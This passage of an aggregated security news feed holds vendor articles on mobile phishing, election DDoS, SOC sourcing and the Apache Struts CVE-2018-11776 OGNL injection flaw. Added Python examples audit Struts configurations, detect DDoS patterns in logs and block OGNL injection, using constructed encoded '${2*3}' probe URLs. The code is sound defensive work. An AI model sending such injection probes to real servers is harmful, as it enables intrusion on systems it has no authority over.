Mobile devices are increasingly becoming the vector through which hackers target employee networks. According to a recent report, the rate at which users are falling for attacks on mobile devices has increased 85 percent each year since 2011. Mobile devices are growing in popularity for attacks because they often lack endpoint security and have access to a wide variety of mobile applications and messaging services. This provides more opportunities for hackers to target employees, who may assume their personal device isn’t a threat to their employer’s network. New attacks use popular apps such as WhatsApp and Facebook to lure victims to download malware, which can expose data stored on these devices.

Having a bring-your-own-device (BYOD) policy is not without risks. For example, the device may be taken offsite for personal use, where it could easily be exposed to unknown Wi-Fi networks, shared with family and friends, or loaded with any number of personal applications. Additionally, devices, especially mobile phones and tablets, can easily be lost. If the device contains sensitive business information, or can connect to a corporate network to access such data, these behaviors seriously increase the risk of compromising company data.

Training Isn’t Always Enough

When the best training isn’t enough, SMBs should put technology in place to back up these efforts. People are human, and as such, they will often make judgement calls that may put them at risk despite the best intentions and training. To supplement training, technology that can identify threats where people might not even think to look is critical. A layered security approach that combines the use of technology, policy and training will be the most effective. Solutions like next-generation firewalls, endpoint protection, behavioral heuristics and more should all be explored when architecting the right strategy for your organization.

Ultimately, phishing attacks rely on social engineering, with the goal of putting something in front of an employee that will entice them to click (or download) without thinking about the consequences.

Attackers are constantly changing tactics, so ensuring that you are armed against the latest threats is critical. Look for solutions that automatically update in addition to training your employees at regular intervals to understand the latest threats. Creating a culture of security awareness is an important first step for any organization. 

About the author: Timur Kovalev serves as the CTO at Untangle and is responsible for driving technology innovation and integration of gateway, endpoint, and cloud technologies. Timur brings over 20 years of experience across various technology stacks and applications.

Copyright 2010 Respective Author at Infosec Island
Categories: InfoSec Island

DDoS Disruption: Election Attacks

InfoSec Island - Mon, 11/05/2018 - 11:08am

In an increasingly politically and economically volatile landscape, cybercrime has become the new geopolitical tool. Attacks on political websites and critical national infrastructure services are ever more frequent, not only because the tools to carry them out are simpler, cheaper and more widely available, but also because attackers want, and are able, to affect real-world events such as election processes while remaining undiscovered. Not surprisingly, a third of respondents to NETSCOUT's latest Worldwide Infrastructure Security Report saw political or ideological disputes as a motivation for DDoS attacks.

As such, we are reminded that cyberattacks against elections are a major concern for the US—recall the recent DDoS attack that crashed a Tennessee county's website on election night in May. The Department of Homeland Security has warned against voting machine hacks and targeted attacks against campaigns. The agency said that in 2016, hackers targeted election systems in 21 states.

Election officials are on high alert for future DDoS attacks and the risk they pose to the availability of systems and, more importantly, to confidence in the entire system, which hangs in the balance as we consider the integrity, sanctity and validity of election results overall. Moreover, DDoS attacks on election night pose a risk to the availability of information: imagine the AP suffering an outage due to a DDoS attack on election night.

The Risk of Volumetric Attack

The sudden emergence of memcached as an amplification vector earlier this year certainly brings the possibility of a massive DDoS attack into focus for election officials. The reality is that while 2018 has ushered in an era of terabit DDoS attacks, with the largest one clocking in at 1.7 Tbps, we have also seen evidence that it will prove to be a year of application-layer attacks.

Unlike volumetric attacks, which overwhelm networks quickly by consuming high levels of bandwidth, application-layer attacks are more subtle and insidious, and much more difficult to detect and block. The application-layer attack, sometimes called a Layer 7 attack, targets the top layer of the OSI model, which supports application and end-user processes. In these attacks, attackers pose as legitimate application users, targeting specific resources and services with repeated application requests that gradually increase in volume, eventually exhausting the ability of the resource to respond. Widely regarded as the most damaging kind of DDoS attack and often fueled by botnets such as Mirai and its many successors, application-layer attacks can inflict significant damage with a much lower volume of traffic than a typical volumetric attack, making them difficult to detect and mitigate proactively with traditional ISP or cloud-based monitoring solutions. They have a singular goal: take out a website, application or online service. While service providers can detect and block volumetric attacks as well as larger application-layer attacks, smaller application attacks can easily escape detection in the large ISP backbone while still being large enough to cause a problem for the enterprise network or data center.

Domain name system (DNS) servers, the directories that resolve names to the IP addresses internet traffic is sent to, are the most common targets, and HTTP and HTTPS services are also targeted frequently, rendering them unavailable to legitimate requests. In fact, many business-critical applications are built on top of HTTP or HTTPS, making them vulnerable to this form of attack even though they may not look like traditional public web applications.

Best Practice DDoS Defense

To effectively detect and mitigate this type of attack in real time, what is needed is an inline, always-on solution deployed on premises as part of a best-practice hybrid DDoS defense strategy that combines cloud-based and on-premises mitigation. An intelligent on-premises system has the visibility and capacity to quickly detect and mitigate these stealthy, low-bandwidth attacks on its own, and early enough to avoid the need for cloud mitigation. Should the attack turn into a flood, the on-premises system can instantly activate cloud-based defenses through cloud signaling. Deploying any widely available on-premises component of a hybrid DDoS defense solution, including those from NETSCOUT, can mitigate the vast majority of application-layer attacks before they can do damage. For organizations facing budget and resource constraints, managed DDoS service options provide a means to save money, amplify in-house resources and reduce risk. Outsourced or in-house, a hybrid DDoS defense ensures detection and mitigation across the full spectrum of DDoS risks while protecting availability.

About the author: Hardik Modi is Senior Director, Threat Intelligence at NETSCOUT|Arbor. He is responsible for the Threat Research and Collections teams, ASERT and ATLAS, respectively. In this role, he drives the creation of security content for NETSCOUT's products, enabling best-in-class protection for users, as well as the continuous delivery and publication of impactful research across the DDoS and intrusion landscapes.


Buy, Rent, or Uber Your Security Operations Center

InfoSec Island - Mon, 11/05/2018 - 5:08am

We all know that data breaches cost a lot—an average of $3.6M per organization.

For cyber criminals, everyone’s a target—and perfect prevention isn’t practical. We must assume that, at some point, every organization’s IT infrastructure will be breached. That’s why we need to continuously monitor, investigate and respond to cyber threats 24/365 if we are to avoid costly breaches and the potential impact to reputation, revenue and customer confidence.

What better way to provide continuous monitoring and analysis than through a security operations center (SOC)? With the people, processes and platform to continuously look across the entire organization's networks, servers, endpoints, applications and databases, a SOC applies expert knowledge to detect and dig into potential threats. One of the key benefits of a SOC is preventing the devastating impact of a breach by reducing dwell time, the gap between when an attacker compromises a network (typically minutes) and when the organization discovers the threat (typically months).

Cost and complexity are roadblocks

Any way you look at it, a SOC is complex and expensive. It requires a lot of specialized hardware and software to generate events and alerts, which must be examined by highly skilled security analysts who can determine which ones represent real threats.

The platform is costly.

You need a well-tuned SIEM (security information and event management) to provide the visibility foundation, along with firewalls, IPS/IDS, vulnerability assessment tools, endpoint monitoring solutions and more. All of this must be fed by threat intelligence that is specific to your organization’s goals and risk tolerance, and the results need to be augmented by machine learning and fine-tuned by human experts.

Processes are costly as well.

Detailed organization-specific playbooks need to be written, spelling out what should happen when ransomware, malware infections, distributed denial of service attacks or other threats are seen. They specify how to investigate, what evidence to gather and when and how to escalate.

Perhaps the most expensive component is people.

It’s difficult enough to hire a team of highly skilled security analysts with the bandwidth and expertise to perform continuous monitoring, while we are experiencing a worldwide shortage. It’s even harder to retain them in the face of stiff competition for scarce talent.

The Complete SOC: Platform. People. Process.

Finding the best route

Reaching the goal of continuous coverage is not a simple make/buy decision; it is more of a buy/rent/co-manage decision: should you build your own SOC, outsource your SIEM (or SOC) platform, or leverage a co-managed SOC solution?

1. Building your own SOC is akin to buying a car to get from Point A to Point B.

You incur all the platform, process and people costs – but you are in total control over where you are going and how to get there (i.e. what your organization sees as risks, threats, and responses). Of course, the cost and complexity could be prohibitive.

2. Outsourcing your SIEM or SOC platform is like renting a car.

You don’t have to make the capital outlay for hardware, but you still need to carry out all the processes—and you must hire, train and retain your own SOC team. It’s less expensive than building your own SOC, but still quite pricy.

3. Leveraging a co-managed SOC solution is like using Uber to get to your destination.

You augment your own internal team with seasoned security experts with mature processes driving a powerful SIEM platform, yet you remain in control of the ultimate destination. A co-managed SOC ensures that the collective team is operating in concert to reach your organization-specific goals.

Uber your way to a SOC

The goal is to get from Point A (your organization’s current security and compliance posture) to Point B (stronger security posture, compliance confidence and incident readiness). Clearly, the most cost-effective way to reach that goal is via a co-managed SOC – the Uber approach. You get the best of both worlds: the best people, processes and platform, at the lowest cost. Not only do you avoid the people and process costs, you retain control over the aspects that are specific to your organization: your risk tolerance, your market realities and your definition of what’s most important to you.

About the author: A. N. Ananth is a co-founder and CEO of EventTracker and was one of the architects of the EventTracker SIEM solution. With an extensive background in product development and operations for telecom network management, he has consulted for many companies on their compliance strategy, audit policy and automated reporting processes.


What You Need to Know about the Recent Apache Struts Vulnerability

InfoSec Island - Mon, 11/05/2018 - 4:55am

Researchers recently revealed a vulnerability in Apache Struts, a widely used Java web application framework. Active exploit attempts were not far behind.

The Equifax breach that occurred roughly a year ago was due to an earlier Apache Struts vulnerability (CVE-2017-5638). The team at Equifax was aware of the vulnerability but took some time to patch it, and in that gap the company was breached and the data of millions was stolen.

To avoid falling victim to a similar attack, it is important for businesses and their IT service providers to understand the recently revealed CVE-2018-11776 Apache Struts vulnerability and how to guard against it. This is an OGNL expression injection vulnerability in the Apache Struts framework: when a vulnerable version is run with a specific vulnerable configuration, an attacker can achieve remote code execution and breach the web application.

The specific vulnerability is exploitable when:

  • An action is configured to use no namespace or a wildcard namespace
  • The “struts.mapper.alwaysSelectFullNamespace” configuration is set to “true”

Struts uses OGNL (Object-Graph Navigation Language), an expression language, for data transfer and type conversion. When an action is configured with no namespace or a wildcard namespace, Struts takes the namespace from the user-supplied URL and, in some cases, evaluates it as an OGNL expression. This means an attacker can place an expression in the URL that is executed when OGNL evaluates it.
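The two preconditions above can be checked directly in a deployment's struts.xml. The following Python is an added example, not code from the article or from the Apache Struts project: it parses a configuration and reports whether `struts.mapper.alwaysSelectFullNamespace` is enabled together with actions in packages that have no namespace or a wildcard namespace. Both embedded configurations are constructed samples, and the package, action and class names are placeholders.

```python
"""Audit a struts.xml for the CVE-2018-11776 preconditions (added example).

Flags the combination the advisory describes: alwaysSelectFullNamespace set to
true together with actions whose package has no namespace or a wildcard
namespace. The two configurations below are constructed samples.
"""
import xml.etree.ElementTree as ET

# Constructed: the weak setting plus two exposed packages and one safe package.
VULNERABLE_STRUTS_XML = """\
<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="index" class="example.IndexAction"/>          <!-- no namespace -->
  </package>
  <package name="legacy" namespace="/*" extends="struts-default">
    <action name="actionChain1" class="example.ChainAction"/>  <!-- wildcard namespace -->
  </package>
  <package name="admin" namespace="/admin" extends="struts-default">
    <action name="status" class="example.StatusAction"/>       <!-- fixed namespace -->
  </package>
</struts>
"""

# Constructed: the constant left at its default and every package given a
# fixed, non-wildcard namespace.
FIXED_STRUTS_XML = """\
<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="false"/>
  <package name="default" namespace="/" extends="struts-default">
    <action name="index" class="example.IndexAction"/>
  </package>
  <package name="admin" namespace="/admin" extends="struts-default">
    <action name="status" class="example.StatusAction"/>
  </package>
</struts>
"""


def always_select_full_namespace(root) -> bool:
    """True when the constant is explicitly set to true (the Struts default is false)."""
    for c in root.iter("constant"):
        if c.get("name") == "struts.mapper.alwaysSelectFullNamespace":
            return c.get("value", "false").strip().lower() == "true"
    return False


def exposed_actions(root):
    """(package, namespace, action) for actions in packages with no or wildcard namespace."""
    found = []
    for pkg in root.iter("package"):
        ns = pkg.get("namespace")
        if not ns or "*" in ns:
            for act in pkg.iter("action"):
                found.append((pkg.get("name"), ns, act.get("name")))
    return found


def audit(struts_xml: str) -> dict:
    """Both conditions must hold for the configuration to be exploitable."""
    root = ET.fromstring(struts_xml)
    full_ns = always_select_full_namespace(root)
    exposed = exposed_actions(root)
    return {
        "alwaysSelectFullNamespace": full_ns,
        "exposed_actions": exposed,
        "vulnerable_config": full_ns and bool(exposed),
    }


if __name__ == "__main__":
    for label, cfg in (("vulnerable", VULNERABLE_STRUTS_XML), ("fixed", FIXED_STRUTS_XML)):
        print(label, audit(cfg))
```

The patched releases (Struts 2.3.35 and 2.5.17) are the fix; the audit is for finding which deployments are exposed while the upgrade is scheduled. The fixed configuration is the interim mitigation the preconditions imply: leave the constant at its default of false and give every package an explicit, non-wildcard namespace.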

An attacker can use this vulnerability to execute arbitrary commands on the compromised server. They could attempt to steal live payment information, install cryptominers or other software, hold the server to ransom, use the server as a starting point for attacks on other systems, or simply delete all the data on the server.

Sharp Increase in Exploitation Attempts

Web application attacks are extremely common today, and they are increasingly weaponized using automated bots. Our honeypots detected a surge in exploitation attempts against the older Apache Struts vulnerability immediately after the current vulnerability was announced. Since then, we have seen the level of activity remain high.

News has come out that the Mirai botnet has been repurposed to perform these exploitation attempts at a massive scale using infected IoT devices. It has been found that some versions of Mirai are attempting to exploit multiple different vulnerabilities to gain access to and control web servers.

When it comes to web application attacks, much more than the web application is at risk. Attackers can also use the web application as a staging area to gain further access to the network and reach other critical resources. This means that any web application, no matter how small, should be patched and kept up to date at all times. However, patching a web application can take time. Between testing the patch to ensure that it does not break core functionality, finding sysadmin resources, and getting approvals for any required downtime, an application can remain unpatched for weeks or months. Having the right web application firewall in place can protect the application during this window by blocking known attack patterns and many zero-day attempts. This provides valuable air cover while you get ready to fix the vulnerability on your web servers.
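One form the air cover described above takes is a request check that rejects the injection pattern before it reaches Struts. The following Python is an added example, not code from the article and not a Barracuda rule: because the namespace Struts evaluates is taken from the URL path, it percent-decodes the path (repeatedly, to catch double encoding) and blocks any request whose path contains an OGNL expression opener. The request list is a constructed sample, and the choice of markers and decoding depth are assumptions.

```python
"""Virtual-patch style request check for OGNL markers in the URL path (added example).

Decodes the request path until it is stable and rejects any path containing an
OGNL expression opener ("${" or "%{"), the marker a probe for CVE-2018-11776
has to carry in the namespace position. The requests below are constructed.
"""
from urllib.parse import unquote, urlsplit

OGNL_OPENERS = ("${", "%{")
MAX_DECODE_ROUNDS = 3  # assumption: enough to undo double and triple encoding


def decode_path(path: str) -> str:
    """Percent-decode until the result stops changing (bounded number of rounds)."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_ognl_probe(url: str) -> bool:
    """True when the decoded path carries an OGNL expression opener."""
    decoded = decode_path(urlsplit(url).path)
    return any(opener in decoded for opener in OGNL_OPENERS)


def filter_requests(urls):
    """Split requests into (allowed, blocked), the decision a WAF makes per request."""
    allowed, blocked = [], []
    for url in urls:
        (blocked if is_ognl_probe(url) else allowed).append(url)
    return allowed, blocked


# Constructed sample requests: two ordinary ones and three probes.
CONSTRUCTED_REQUESTS = [
    "/struts2-showcase/index.action",
    "/results?county=42",
    "/%24%7B2*3%7D/actionChain1.action",         # "${2*3}" in the namespace position
    "/%2524%257B2*3%257D/actionChain1.action",   # the same, double-encoded
    "/%25%7B2*3%7D/index.action",                # "%{2*3}"
]


if __name__ == "__main__":
    allowed, blocked = filter_requests(CONSTRUCTED_REQUESTS)
    print("allowed:", allowed)
    print("blocked:", blocked)
```

The check looks only at the decoded path, because that is where the namespace comes from; query strings and bodies are left alone so ordinary requests are unaffected. A site whose legitimate URLs contain these characters would need an exception, and a production rule should also log the decoded path so the SOC can see what was attempted.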

How a WAF Can Protect Against Other Attacks

A WAF should provide complete application protection, including against attacks most people don’t consider — like application distributed denial of service (DDoS), brute force attacks, and web scraping.

Application DDoS attacks are the subtle siblings of volumetric DDoS attacks. They fly under the radar by performing low-and-slow attacks against a web server, tying up its resources and bringing down an application. A typical example is multiple concurrent downloads of a large file, each performed very slowly. A WAF that tracks per-client request and connection behaviour can detect and block these attacks.
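Both the application-layer flood described in the DDoS Disruption piece above (repeated requests from a client posing as a legitimate user, ramping up until the resource is exhausted) and the low-and-slow download pattern described here are visible in ordinary access logs. The following Python is an added example, not code from either article or from any vendor product: it runs two detectors over constructed nginx-style log lines. The log format (request time in seconds as the last field), the thresholds and the addresses are assumptions chosen for the example.

```python
"""Application-layer DDoS detection over web server access logs (added example).

Assumed log format: combined log lines with the request duration in seconds
appended as the last field. Two detectors:
  1. rate: one client's per-minute request count to one path passes RATE_LIMIT
     (the repeated, gradually increasing requests of a Layer 7 flood);
  2. low-and-slow: one client holds several long-running, low-throughput
     downloads open at the same time (the slow large-file download pattern).
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<rt>[\d.]+)$'
)
RATE_LIMIT = 40          # requests per client per path per minute (assumed policy)
SLOW_MIN_SECONDS = 60.0  # a response that takes at least this long ...
SLOW_MAX_BPS = 2000.0    # ... at under this throughput counts as a slow download
SLOW_CONCURRENT = 5      # this many open at once from one client is an attack


def parse(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    d["bytes"] = int(d["bytes"])
    d["rt"] = float(d["rt"])
    d["path"] = d["path"].split("?", 1)[0]  # group by path, not by query string
    return d


def detect(lines):
    """Return a list of alerts: ("rate", ip, path, minute, n) or ("low-and-slow", ip, peak)."""
    per_minute = Counter()          # (ip, path, minute) -> request count
    slow_spans = defaultdict(list)  # ip -> [(start, end)] of slow downloads
    for line in lines:
        r = parse(line)
        if r is None:
            continue
        minute = r["ts"].replace(second=0, microsecond=0)
        per_minute[(r["ip"], r["path"], minute)] += 1
        if r["rt"] >= SLOW_MIN_SECONDS and r["bytes"] / r["rt"] < SLOW_MAX_BPS:
            end = r["ts"]           # access logs are written when the response completes
            slow_spans[r["ip"]].append((end - timedelta(seconds=r["rt"]), end))
    alerts = []
    for (ip, path, minute), n in sorted(per_minute.items()):
        if n > RATE_LIMIT:
            alerts.append(("rate", ip, path, minute.isoformat(), n))
    for ip, spans in slow_spans.items():
        # sweep over start/end events to find the peak number open at one instant
        events = sorted([(s, 1) for s, _ in spans] + [(e, -1) for _, e in spans])
        peak = open_now = 0
        for _, delta in events:
            open_now += delta
            peak = max(peak, open_now)
        if peak >= SLOW_CONCURRENT:
            alerts.append(("low-and-slow", ip, peak))
    return alerts


def constructed_log():
    """Constructed sample: a normal visitor, a ramping client and a slow-download client."""
    t0 = datetime(2018, 11, 5, 11, 8, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts:%d/%b/%Y:%H:%M:%S %z}] "GET {path} HTTP/1.1" 200 {b} {rt:.3f}'
    lines = []
    for i in range(6):  # normal visitor: a few result pages over three minutes
        lines.append(fmt.format(ip="198.51.100.7", ts=t0 + timedelta(seconds=30 * i),
                                path="/results?county=42", b=18211, rt=0.41))
    for minute, n in enumerate((10, 25, 70)):  # attacker ramps up on an expensive query
        for i in range(n):
            lines.append(fmt.format(ip="203.0.113.9",
                                    ts=t0 + timedelta(minutes=minute, seconds=i % 60),
                                    path="/results?county=%d" % i, b=18211, rt=0.41))
    for i in range(8):  # eight overlapping 120 s downloads of a 140 KB file
        lines.append(fmt.format(ip="203.0.113.50", ts=t0 + timedelta(seconds=120 + i),
                                path="/ballot.pdf", b=143360, rt=120.0))
    return lines


if __name__ == "__main__":
    for alert in detect(constructed_log()):
        print(alert)
```

The rate detector only fires once the ramp crosses the limit, which is the point: the first two minutes of the attacker's traffic look like a busy but legitimate user, and a threshold tuned against the path's normal per-client rate is what separates the two. The slow-download detector uses the fact that an access log records a response when it finishes, so the start time can be reconstructed from the duration and the overlap counted.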

Other types of automated attacks that occur often are brute force attacks, where attackers try to brute-force logins to applications, and web scraping. Web scraping is a large problem today: bots masquerading as valid users attempt to steal content and competitive information from web applications for profit. A good WAF should have a powerful bot mitigation engine to detect and block these bots.

Multiple Layers of Protection for the Win

Organizations need to implement a multi-layered approach to ensure complete defense of their network. Defense in depth requires these layers to work in unison to defeat the various attacks against a network. This includes Advanced DDoS Protection to block volumetric attacks, cloud-generation firewalls to secure your network perimeter, and a WAF that combines web and API security along with secure application delivery in a single platform. All these layers work together to protect your applications and provide you with valuable air cover against today’s evolving threat landscape.

About the author: Tushar Richabadas is product manager for the Barracuda CloudGen WAF product line. His specific areas of focus are application security in the cloud, automation, and bot mitigation.
